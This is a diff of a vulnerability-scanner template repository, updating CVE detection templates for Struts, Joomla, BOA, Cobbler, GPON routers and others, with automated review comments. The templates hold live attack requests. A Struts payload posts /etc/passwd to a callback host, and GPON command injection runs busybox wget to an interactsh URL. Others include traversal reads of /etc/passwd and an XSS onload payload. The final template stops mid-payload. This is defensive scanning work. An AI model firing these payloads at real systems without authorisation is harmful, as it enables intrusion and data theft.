@@ -1,18 +1,20 @@ id: CVE-2017-7921 + info: - name: Hikvision Authentication Bypass + name: Hikvision - Authentication Bypass author: princechaddha severity: critical - description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. + description: Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. 
reference: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 - tags: cve,cve2017,auth-bypass + - https://nvd.nist.gov/vuln/detail/CVE-2017-7921 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 + cvss-score: 10 cve-id: CVE-2017-7921 cwe-id: CWE-287 + tags: cve,cve2017,auth-bypass,hikvision requests: - method: GET @@ -30,3 +32,5 @@ requests: words: - "application/xml" part: header + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml index a4968604e8..bbbf1e7547 100644 --- a/cves/2017/CVE-2017-8917.yaml +++ b/cves/2017/CVE-2017-8917.yaml @@ -1,16 +1,22 @@ id: CVE-2017-8917 + info: - name: Joomla SQL Injection + name: Joomla! <3.7.1 - SQL Injection author: princechaddha severity: critical - description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors. - reference: https://www.cvedetails.com/cve/CVE-2017-8917/ - tags: cve,cve2017,joomla,sqli + description: | + Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors. + reference: + - https://www.cvedetails.com/cve/CVE-2017-8917/ + - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html + - http://www.securityfocus.com/bid/98515 + - http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-8917 cwe-id: CWE-89 + tags: cve,cve2017,joomla,sqli requests: - method: GET @@ -19,6 +25,8 @@ requests: matchers: - type: word + part: body words: - "cf79ae6addba60ad018347359bd144d2" - part: body + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-9140.yaml b/cves/2017/CVE-2017-9140.yaml index 365d6c0957..df598c2967 100644 
--- a/cves/2017/CVE-2017-9140.yaml +++ b/cves/2017/CVE-2017-9140.yaml @@ -4,14 +4,19 @@ info: name: Reflected XSS - Telerik Reporting Module author: dhiyaneshDk severity: medium - tags: cve,cve2017,xss,telerik - description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. - reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module + description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. + reference: + - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module + - https://nvd.nist.gov/vuln/detail/CVE-2017-9140 + - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module + - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406) + remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-9140 cwe-id: CWE-79 + tags: cve,cve2017,xss,telerik requests: - method: GET @@ -29,3 +34,5 @@ requests: - '#000000"onload="prompt(1)' - 'Telerik.ReportViewer.axd?name=Resources' condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index 843b3c84d2..bc6706fc06 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml 
@@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 - tags: cve,cve2017,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + - https://github.com/MindscapeHQ/raygun4wordpress/pull/17 + - https://github.com/MindscapeHQ/raygun4wordpress/issues/16 + - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-9288 cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index a76d387e75..393153702a 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -9,12 +9,12 @@ info: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - tags: cve,cve2017,atlassian,jira,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-9506 cwe-id: CWE-918 + tags: cve,cve2017,atlassian,jira,ssrf,oast requests: - raw: @@ -25,6 +25,6 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml index a7acef344d..661dc3e197 100644 --- a/cves/2017/CVE-2017-9791.yaml +++ b/cves/2017/CVE-2017-9791.yaml 
@@ -1,19 +1,20 @@ id: CVE-2017-9791 info: - name: Apache Struts2 S2-053 RCE + name: Apache Struts2 S2-053 - Remote Code Execution author: pikpikcu severity: critical - description: The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage. + description: Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html - tags: cve,cve2017,apache,rce + - http://www.securitytracker.com/id/1038838 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-9791 cwe-id: CWE-20 + tags: cve,cve2017,apache,rce,struts requests: - method: POST @@ -27,15 +28,18 @@ requests: matchers-condition: and matchers: - type: word + part: header words: - "Content-Type: text/html" - part: header - type: regex + part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status status: - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 3fbcb5b5e2..fafd5baa0e 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml 
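Review bot: The new title `name: Apache Struts2 S2-053 - Remote Code Execution` contradicts the visible reference `http://struts.apache.org/docs/s2-048.html` and the description's Struts 1 plugin / ActionMessage vector, which is the S2-048 advisory; S2-053 is a separate advisory for a different CVE, so the title should read `name: Apache Struts2 S2-048 - Remote Code Execution`. The first reference, `alert-cve-2017-9805-3889403.html`, is Oracle's bulletin named after another CVE — keep it if it was intended to cover this issue, otherwise it looks copied from the CVE-2017-9805 template. Tightening the regex to `root:.*:0:0:` is good; `condition: and` on a single-pattern regex matcher is harmless but redundant.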
@@ -1,19 +1,20 @@ id: CVE-2017-9805 info: - name: Apache Struts2 S2-052 RCE + name: Apache Struts2 S2-052 - Remote Code Execution author: pikpikcu severity: high - description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. + description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - tags: cve,cve2017,apache,rce,struts + - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 + tags: cve,cve2017,apache,rce,struts requests: - method: POST @@ -42,7 +43,7 @@ requests: wget --post-file /etc/passwd - burpcollaborator.net + {{interactsh-url}} false @@ -93,3 +94,5 @@ requests: - type: status status: - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index 10a07fec84..e0057d0671 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml 
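Review bot: Replacing `burpcollaborator.net` with `{{interactsh-url}}` fixes the dead callback host, but the surrounding payload is still `wget --post-file /etc/passwd` to that URL, which uploads the target's /etc/passwd to a third-party OAST server from what is meant to be a detection template; a plain callback, `wget http://{{interactsh-url}}`, proves code execution without exfiltrating data. Consider dropping `--post-file /etc/passwd` and adding `# Callback only; do not exfiltrate target files` above the request. The `status: 500` added in the third hunk is consistent with XStream failing after the gadget runs, but a 500 alone is common, so the interactsh match should remain the authoritative signal (the `matchers-condition` is outside the visible hunk).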
@@ -1,17 +1,21 @@ id: CVE-2017-9822 info: - name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) + name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution author: milo2012 severity: high - description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) - tags: cve,cve2017,dotnetnuke,bypass - reference: https://github.com/murataydemir/CVE-2017-9822 + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution. + reference: + - https://github.com/murataydemir/CVE-2017-9822 + - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 + - http://www.dnnsoftware.com/community/security/security-center + - http://www.securityfocus.com/bid/102213 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 + tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization requests: - raw: @@ -33,4 +37,6 @@ requests: - type: status status: - - 404 \ No newline at end of file + - 404 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-9833.yaml b/cves/2017/CVE-2017-9833.yaml new file mode 100644 index 0000000000..2f8c595a7e --- /dev/null +++ b/cves/2017/CVE-2017-9833.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2017-9833 + +info: + name: BOA Web Server 0.94.14 - Arbitrary File Access + author: 0x_Akoko + severity: high + description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. + reference: + - https://www.exploit-db.com/exploits/42290 + - https://www.cvedetails.com/cve/CVE-2017-9833 + - https://pastebin.com/raw/rt7LJvyF + - https://www.exploit-db.com/exploits/42290/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-9833 + cwe-id: CWE-22 + tags: boa,lfr,lfi,cve,cve2017 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index bb1e917308..7dfe3202f6 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml 
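Review bot: The regex `root:[x*]:0:0` in the new BOA template only matches a passwd entry whose password field is literally `x` or `*`; embedded firmware of this kind often carries the hash inline (`root:$1$...:0:0:`), in which case a successful traversal read is reported as a miss. `root:.*:0:0:` — the form the CVE-2018-10822 and CVE-2017-9791 hunks in this same commit moved to — covers both cases. The reference list also contains exploit-db 42290 twice (with and without a trailing slash), and the request hard-codes `NAME=admin&PWD=admin` while the description says the read works "without using access credentials"; a short comment stating that those parameters are ignored by the vulnerable handler, if that is the case, would save the next reader a check.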
@@ -1,21 +1,22 @@ id: CVE-2017-9841 info: - name: CVE-2017-9841 + name: PHPUnit - Remote Code Execution author: Random_Robbie,pikpikcu severity: critical - description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "?mimeType=text/html" - - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/jolokia/read?mimeType=text/html" + + stop-at-first-match: true matchers-condition: and matchers: + + - type: word + part: body + words: + - "" + - "java.lang.IllegalArgumentException" + - "No type with name" + condition: and + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "" - part: body - - type: word - words: - - "text/html" - part: header \ No newline at end of file diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml index 9421966f6e..8fe310b37c 100644 --- a/cves/2018/CVE-2018-1000130.yaml +++ b/cves/2018/CVE-2018-1000130.yaml @@ -5,15 +5,15 @@ info: author: milo2012 severity: high description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server. - tags: cve,cve2018,jolokia,rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 - cve-id: CVE-2018-1000130 - cwe-id: CWE-74 reference: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://access.redhat.com/errata/RHSA-2018:2669 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2018-1000130 + cwe-id: CWE-74 + tags: cve,cve2018,jolokia,rce,jndi,proxy requests: - raw: diff --git a/cves/2018/CVE-2018-1000226.yaml b/cves/2018/CVE-2018-1000226.yaml new file mode 100644 index 0000000000..7e142d5b63 --- /dev/null +++ b/cves/2018/CVE-2018-1000226.yaml 
@@ -0,0 +1,63 @@ +id: CVE-2018-1000226 + +info: + name: Cobbler - Authentication Bypass + author: c-sh0 + severity: critical + description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. + reference: + - https://github.com/cobbler/cobbler/issues/1916 + - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-1000226 + cwe-id: CWE-732 + tags: cve,cve2018,cobbler,auth-bypass + +requests: + - raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + _CobblerXMLRPCInterface__make_token + + + + cobbler + + + + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "Content-Type: text/xml" + + - type: word + part: body + words: + - "" + + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" + + - type: regex + part: body + regex: + - "(.*[a-zA-Z0-9].+==)" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1000533.yaml b/cves/2018/CVE-2018-1000533.yaml index 7532d878ce..75553411a0 100644 --- a/cves/2018/CVE-2018-1000533.yaml +++ b/cves/2018/CVE-2018-1000533.yaml 
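Review bot: The dsl matcher `!contains(tolower(body), 'faultCode')` can never observe a fault: `tolower(body)` lowercases the response, so the mixed-case needle `faultCode` is never found and the expression is always true, turning the intended negative check into a no-op. Use a lowercase needle, `- "!contains(tolower(body), 'faultcode')"`, or drop `tolower`. With that fixed, the regex `(.*[a-zA-Z0-9].+==)` is still a very loose token shape; anchoring it to the value element the XML-RPC response returns would cut false positives, though the element names are not visible in this rendering. It is also worth a comment above the request that calling `_CobblerXMLRPCInterface__make_token` mints a real session token on the target — this template exploits rather than fingerprints, so it should only run with authorization.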
@@ -1,17 +1,21 @@ id: CVE-2018-1000533 info: - name: GitList < 0.6.0 RCE + name: GitList < 0.6.0 Remote Code Execution author: pikpikcu severity: critical - description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user. - reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 - tags: rce,git,cve,cve2018,gitlist + description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution. + reference: + - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533 + - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html + - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1000533 cwe-id: CWE-20 + tags: rce,git,cve,cve2018,gitlist requests: - raw: @@ -40,3 +44,5 @@ requests: words: - "root:/root:/bin/bash" part: body + +# Enhanced by mp on 2022/04/08 diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml index e87764fc8b..91d7513c33 100644 --- a/cves/2018/CVE-2018-1000600.yaml +++ b/cves/2018/CVE-2018-1000600.yaml 
@@ -2,18 +2,19 @@ id: CVE-2018-1000600 info: name: Pre-auth Fully-responded SSRF + author: geeknik + severity: high description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. reference: - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ - author: geeknik - severity: high - tags: cve,cve2018,jenkins,ssrf,oast + - https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2018-1000600 cwe-id: CWE-200 + tags: cve,cve2018,jenkins,ssrf,oast requests: - method: GET diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml index 5dbeddcdaa..d82498789c 100644 --- a/cves/2018/CVE-2018-1000861.yaml +++ b/cves/2018/CVE-2018-1000861.yaml 
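Review bot: The added reference `https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915` duplicates the first entry apart from the `www.` host, so it adds nothing; drop it or replace it with the NVD entry as the other templates in this commit do. The title `name: Pre-auth Fully-responded SSRF` still names no product while every other retitled template here leads with one — suggest `name: Jenkins GitHub Plugin <=1.29.1 - Pre-auth Fully-responded SSRF`, taking the version from the description. The description (a context line here) is also missing its verb: "allows attackers to an attacker-specified URL" should read "allows attackers to connect to an attacker-specified URL".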
@@ -1,17 +1,21 @@ id: CVE-2018-1000861 info: - name: Jenkins 2.138 Remote Command Execution + name: Jenkins - Remote Command Injection author: dhiyaneshDK,pikpikcu severity: critical - reference: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 - tags: cve,cve2018,jenkin,rce + description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way. + reference: + - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 + - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595 + - http://www.securityfocus.com/bid/106176 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - description: "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way." + tags: cve,cve2018,jenkin,rce,jenkins requests: - method: GET @@ -29,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-10093.yaml b/cves/2018/CVE-2018-10093.yaml index 6c881cf9d6..2af93144ba 100644 --- a/cves/2018/CVE-2018-10093.yaml +++ b/cves/2018/CVE-2018-10093.yaml 
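Review bot: The retitled `name: Jenkins - Remote Command Injection` and the description's "susceptible to a remote command injection" mischaracterize the issue: the same description goes on to say attackers "invoke some methods on Java objects by accessing crafted URLs", the removed description called it a code execution vulnerability, and `cwe-id: CWE-502` is deserialization — none of which is command injection. Suggest `name: Jenkins <=2.153 / LTS <=2.138.3 - Remote Code Execution` (versions are already in the description) and "is susceptible to remote code execution via ...". The tag list now carries both the misspelled `jenkin` and the new `jenkins`; keep only `jenkins` unless the old tag is relied on elsewhere.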
@@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/46164 - https://nvd.nist.gov/vuln/detail/CVE-2018-10093 - tags: cve,cve2018,rce,iot + - https://www.exploit-db.com/exploits/46164/ + - http://seclists.org/fulldisclosure/2019/Jan/38 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2018-10093 cwe-id: CWE-862 + tags: cve,cve2018,rce,iot requests: - method: GET diff --git a/cves/2018/CVE-2018-10095.yaml b/cves/2018/CVE-2018-10095.yaml index 7c1ad45220..d66f487a38 100644 --- a/cves/2018/CVE-2018-10095.yaml +++ b/cves/2018/CVE-2018-10095.yaml @@ -6,13 +6,17 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095 - tags: cve,cve2018,xss,dolibarr + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-10095 + - https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/ + - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56 + - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-10095 cwe-id: CWE-79 + tags: cve,cve2018,xss,dolibarr requests: - method: GET diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index 577e38e5cb..708fcc51fb 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml 
@@ -2,13 +2,15 @@ id: CVE-2018-10141 info: name: GlobalProtect Login page XSS - severity: medium author: dhiyaneshDk + severity: medium description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10141 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-10141 + - https://security.paloaltonetworks.com/CVE-2018-10141 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-10141 cwe-id: CWE-79 tags: cve,cve2018,panos,vpn,globalprotect,xss @@ -32,4 +34,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2018/CVE-2018-10201.yaml b/cves/2018/CVE-2018-10201.yaml index eb1ae10d80..f5b143ea99 100644 --- a/cves/2018/CVE-2018-10201.yaml +++ b/cves/2018/CVE-2018-10201.yaml @@ -1,13 +1,15 @@ id: CVE-2018-10201 info: - name: Ncomputing vSPace Pro 10 and 11 Directory Traversal + name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal author: 0x_akoko severity: high description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html - https://www.cvedetails.com/cve/CVE-2018-10201 + - http://www.kwell.net/kwell_blog/?p=5199 + - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -32,3 +34,5 @@ requests: - "fonts" - "extensions" condition: and + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml new file mode 100644 index 0000000000..d50142694d --- /dev/null +++ b/cves/2018/CVE-2018-10562.yaml 
@@ -0,0 +1,41 @@ +id: CVE-2018-10562 + +info: + name: Dasan GPON Devices - Remote Code Execution + author: gy741 + severity: critical + description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. + reference: + - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router + - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py + - https://nvd.nist.gov/vuln/detail/CVE-2018-10562 + - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-10562 + cwe-id: CWE-78 + tags: cve,cve2018,dasan,gpon,rce,oast + +requests: + - raw: + - | + POST /GponForm/diag_Form?images/ HTTP/1.1 + Host: {{Hostname}} + + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://{{interactsh-url}}`;busybox wget http://{{interactsh-url}}&ipv=0 + + - | + POST /GponForm/diag_Form?images/ HTTP/1.1 + Host: {{Hostname}} + + XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget 